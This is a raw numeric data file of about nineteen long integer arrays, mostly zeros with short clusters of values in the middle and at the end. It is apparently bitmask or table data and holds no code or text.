[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 4740, 51521, 33510, 12294, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 3584, 62336, 49376, 26424, 63758, 17753],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 31108, 57409, 61414, 44294, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 45824, 42176, 29488, 36428, 18355, 8976],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 57476, 63297, 23782, 10758, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 31744, 65280, 18368, 12272, 36476, 52947],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 18308, 3649, 51686, 42758, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 14592, 30272, 64400, 41828, 313, 31890],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 44676, 9537, 14054, 9222, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 64000, 36480, 20384, 24808, 29690, 19197],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 5508, 15425, 41958, 41222, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 3840, 7104, 22768, 54716, 28687, 51844],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 31876, 21313, 4326, 7686, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 2048, 33280, 4224, 51232, 11528, 53335],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 58244, 27201, 32230, 39686, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 46336, 62784, 9040, 35668, 15797, 34150],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 19076, 33089, 60134, 6150, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 9728, 47488, 608, 17304, 294, 24929],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 45444, 38977, 22502, 38150, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 43776, 25280, 12976, 31276, 10155, 33208],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 6276, 44865, 50406, 4614, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 54272, 5376, 56640, 16720, 56276, 35995],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 32644, 50753, 12774, 36614, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 28928, 50240, 40720, 10308, 24433, 4090],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 62480, 59012, 56641, 40678, 3078, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 37376, 29824, 39200, 16200, 11410, 3205],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 48144, 19844, 62529, 3046, 35078, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 39936, 34560, 31168, 49264, 27548, 60039, 7340],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 33808, 46212, 2881, 30950, 1542, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 47104, 28160, 19328, 50912, 26527],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 7044, 8769, 58854, 33542, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 13312, 27904, 58176, 11984, 59956, 621, 20558],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 5136, 33412, 14657, 21222, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 63488, 15872, 49024, 54240, 33784, 49726, 36969],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 56336, 59780, 20545, 49126, 32006, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 3072, 41728, 24768, 49712, 39436, 29859, 12128],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 42000, 20612, 26433, 11494, 64006, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 27392, 33472, 38576, 23084, 34147],
